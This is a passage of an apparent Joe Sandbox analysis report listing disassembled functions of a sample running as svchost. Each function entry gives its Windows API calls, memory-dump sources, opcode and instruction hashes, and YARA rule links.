                                                            • GetLastError.KERNEL32(?,00000000,00838411,-00009570,00000000,000007F3), ref: 00839BB6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 61b18bb24ab3d0f8eca52d21f509f43542ce0350b2c9ff4972c023361409ba15
                                                            • Instruction ID: a701831cac4234ecaa6f66309d54a74f37a1a5c9d186a335c23b8fe740a1b918
                                                            • Opcode Fuzzy Hash: 61b18bb24ab3d0f8eca52d21f509f43542ce0350b2c9ff4972c023361409ba15
                                                            • Instruction Fuzzy Hash: F9419B316043258FDB24DF29E58486AF7E6FBD4320F158A2DE8C1C3260D7F4AD448AD2
                                                            Function 0085BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008597E5: GetLastError.KERNEL32(?,00871030,00854674,00871030,?,?,00853F73,00000050,?,00871030,00000200), ref: 008597E9
                                                              • Part of subcall function 008597E5: _free.LIBCMT ref: 0085981C
                                                              • Part of subcall function 008597E5: SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 0085985D
                                                              • Part of subcall function 008597E5: _abort.LIBCMT ref: 00859863
                                                              • Part of subcall function 0085BB4E: _abort.LIBCMT ref: 0085BB80
                                                              • Part of subcall function 0085BB4E: _free.LIBCMT ref: 0085BBB4
                                                              • Part of subcall function 0085B7BB: GetOEMCP.KERNEL32(00000000,?,?,0085BA44,?), ref: 0085B7E6
                                                            • _free.LIBCMT ref: 0085BA9F
                                                            • _free.LIBCMT ref: 0085BAD5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: 5dbc95175f521c1c643aec206c8256f8fd732fb90921ea761f745f642d1edfb6
                                                            • Instruction ID: 06e108cab496420912df27d2be0e4df986e06453a3aaed3e72dc10a6872cdc37
                                                            • Opcode Fuzzy Hash: 5dbc95175f521c1c643aec206c8256f8fd732fb90921ea761f745f642d1edfb6
                                                            • Instruction Fuzzy Hash: 9F31C431904219AFDB11DFA8D441B9D77F5FF50322F21409AED04DB2A2EB725D48DB51
                                                            Function 00831E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00831E55
                                                              • Part of subcall function 00833BBA: __EH_prolog.LIBCMT ref: 00833BBF
                                                            • _wcslen.LIBCMT ref: 00831EFD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 955074452486dc1a99e104cc68b14fb017bac8071f92235a7ae6be7366e62ed7
                                                            • Instruction ID: 4854b1775ed2858a5b453a00e1b0d0d8b9ab41fbfdd700ad48f779c5693343f9
                                                            • Opcode Fuzzy Hash: 955074452486dc1a99e104cc68b14fb017bac8071f92235a7ae6be7366e62ed7
                                                            • Instruction Fuzzy Hash: EF314871904209AFCF11DF98C949AEEBBF6FF88710F1004AAE845E7251CB325E55CBA1
                                                            Function 00839DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008373BC,?,?,?,00000000), ref: 00839DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00839E70
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 2c23233728b8f3b6ca709fdc0f4d13c1179a3e2049430b812b01b75381b83387
                                                            • Instruction ID: 2aad2a8c6877dd025f742080ca9fedd2940963e4f44afa1de5ac15d8d7833e08
                                                            • Opcode Fuzzy Hash: 2c23233728b8f3b6ca709fdc0f4d13c1179a3e2049430b812b01b75381b83387
                                                            • Instruction Fuzzy Hash: 2D21D231248246EBC714DF75C896AABBBE8FF95304F08491CF4C5C7141D3A9D90C9BA2
                                                            Function 0083966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00839F27,?,?,0083771A), ref: 008396E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00839F27,?,?,0083771A), ref: 00839716
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 19312363d7531e652cd028ecbc079f0f9315059b8b5a83e28d7d56025023f98d
                                                            • Instruction ID: 53a7f74f58aa8a7f7bd3c34de4b1e671bc5eee34e06282d3dcf45acdcaebe9d2
                                                            • Opcode Fuzzy Hash: 19312363d7531e652cd028ecbc079f0f9315059b8b5a83e28d7d56025023f98d
                                                            • Instruction Fuzzy Hash: 9E21C4715047446FE3708A69CC8ABA7B7DCFB99324F100A19FAD5C21D1D7B4A84486B2
                                                            Function 00839E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00839EC7
                                                            • GetLastError.KERNEL32 ref: 00839ED4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 44a1d27d2d5a5d43beb2b47f63f01f8d1cba1fe8d2e4857c6e6c32789f27a429
                                                            • Instruction ID: ef868fdda042ac1e02a25e765382a7000a69319c21e2c13cbd3e482f5f78bc08
                                                            • Opcode Fuzzy Hash: 44a1d27d2d5a5d43beb2b47f63f01f8d1cba1fe8d2e4857c6e6c32789f27a429
                                                            • Instruction Fuzzy Hash: 7C11E531600704ABD724C66CC845BA6B7E8FB84370F504A29E193D26D0D7F0ED49C7A0
                                                            Function 00858E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00858E75
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00871098,008317CE,?,?,00000007,?,?,?,008313D6,?,00000000), ref: 00858EB1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: 61ca34cffda4ed79cdd614841e15f128caf8441d4ed625d48d3aa27d840461c4
                                                            • Instruction ID: 025b4a17c1fa0c125de03f5dc52923dfbad29ba5648b4bf21d6448f489e62f12
                                                            • Opcode Fuzzy Hash: 61ca34cffda4ed79cdd614841e15f128caf8441d4ed625d48d3aa27d840461c4
                                                            • Instruction Fuzzy Hash: F4F0C232201115E6CB212A6AAC07B6F3779FF81B73B644127FC18F6191DF609D0885A1
                                                            Function 0084109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 008410AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 008410B2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 41bf1dde24e40e26145350519a3057697dcfa1132abb8f260d3a9172e45bc5a0
                                                            • Instruction ID: 77a3fe750d0d5207a77659c4b2bf3755b7df62594675a5d1c83a766b7dc57dc3
                                                            • Opcode Fuzzy Hash: 41bf1dde24e40e26145350519a3057697dcfa1132abb8f260d3a9172e45bc5a0
                                                            • Instruction Fuzzy Hash: 9FE0DF72F0094DA7CF0D8BB49C099EB73EDFA442047208179E403E3101FA70EE854AA0
                                                            Function 0083A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 0a8a7761cd96aacae96ae9979db68788bc74f57c1b421b60a0e7efd023e675dc
                                                            • Instruction ID: b331cf9c5cddfd1b2c5818be16b748ff5c88030777f25a031d9a604f0e736500
                                                            • Opcode Fuzzy Hash: 0a8a7761cd96aacae96ae9979db68788bc74f57c1b421b60a0e7efd023e675dc
                                                            • Instruction Fuzzy Hash: 15F0A932210209BBDF025FA0DC41FDA376CFB04385F488060B988E61A0DB71CA98EBA1
                                                            Function 0083A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641,000000FF), ref: 0083A1F1
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641), ref: 0083A21F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: e52a1aeeb04d8a3fd0a7d84a79679d426e2e8f3a23141b92cca81921453ac3da
                                                            • Instruction ID: dfda61303ba8573d573a1e927a952b2feba4c0452cb9b67aaf35717f563b5b7f
                                                            • Opcode Fuzzy Hash: e52a1aeeb04d8a3fd0a7d84a79679d426e2e8f3a23141b92cca81921453ac3da
                                                            • Instruction Fuzzy Hash: 2CE092311402196BDB015F64DC46FDA775CFB08381F484021B944E2050EB61DE88DAA2
                                                            Function 0084AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00862641,000000FF), ref: 0084ACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00862641,000000FF), ref: 0084ACB5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: 5070e6c528f095caab76dde86da40c6e1e93af437ad5d35ba9b638ea40831fcb
                                                            • Instruction ID: 7f835974e32f8c72a1ae4e3a6c2505e3b4d793e11b634537bf4a2acf516d79a2
                                                            • Opcode Fuzzy Hash: 5070e6c528f095caab76dde86da40c6e1e93af437ad5d35ba9b638ea40831fcb
                                                            • Instruction Fuzzy Hash: 13E06572544650EFC7009B5CDC06B45FBA9FB48B20F044266F416D3760CB74A840CB94
                                                            Function 0083A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,0083A23A,?,0083755C,?,?,?,?), ref: 0083A254
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0083A23A,?,0083755C,?,?,?,?), ref: 0083A280
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 767bd13ca05bc71f4ead6b9c274942fa6752f95681fa5206f482e5f71cd1f31d
                                                            • Instruction ID: b7d21edc224a7051ef33ee9981cce19ca0ebfedcbd05c3d6f7c9f97e698780df
                                                            • Opcode Fuzzy Hash: 767bd13ca05bc71f4ead6b9c274942fa6752f95681fa5206f482e5f71cd1f31d
                                                            • Instruction Fuzzy Hash: 6AE092319001285BCB11AB68CC05BD9B75CFB183E1F044261FE84E3190D770DE44CAE1
                                                            Function 0084DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0084DEEC
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0084DF03
                                                              • Part of subcall function 0084B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                              • Part of subcall function 0084B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                              • Part of subcall function 0084B568: IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                              • Part of subcall function 0084B568: TranslateMessage.USER32(?), ref: 0084B5AC
                                                              • Part of subcall function 0084B568: DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 1082566141f4a18e3b9869f95fa9f86fc99b08fb7b6353d1e00944fc4af038c1
                                                            • Instruction ID: 3380d560df9accad0fe71735754c87769cf9b418182ec847c1c69a11b1bef892
                                                            • Opcode Fuzzy Hash: 1082566141f4a18e3b9869f95fa9f86fc99b08fb7b6353d1e00944fc4af038c1
                                                            • Instruction Fuzzy Hash: A0E092B650024C66DF02AB68DC0EF9E3B6CBB15785F040851B204DB0B2EA78EA508766
                                                            Function 0084081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 83a80c43f5251918dcb72e901fe4f53e837dbe7edec5c9b17f5d9f12747c692b
                                                            • Instruction ID: 81e2a453693af965b8ba6b1633ae1fce04ca819c70830d22abbd29a79ebb2e35
                                                            • Opcode Fuzzy Hash: 83a80c43f5251918dcb72e901fe4f53e837dbe7edec5c9b17f5d9f12747c692b
                                                            • Instruction Fuzzy Hash: ECE01AB680016C6ADB11ABA49C49FDABBACFF09391F040065B649E2005DAB4DA848BA1
                                                            Function 0084A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0084A3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0084A3E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 7df966a5ecbce3721819c974f9456c06b30f3e4b0649573a314a560412d24214
                                                            • Instruction ID: 3ca87f8914ab6fc288c1121306069ccb93e8eb0f6470059d35b5456852074621
                                                            • Opcode Fuzzy Hash: 7df966a5ecbce3721819c974f9456c06b30f3e4b0649573a314a560412d24214
                                                            • Instruction Fuzzy Hash: 23E0ED7150121CEBCB14DF99C5456AEBBE8FB05364F10805AA886E7301E374AE04DB92
                                                            Function 00852B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00852BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00852BB5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
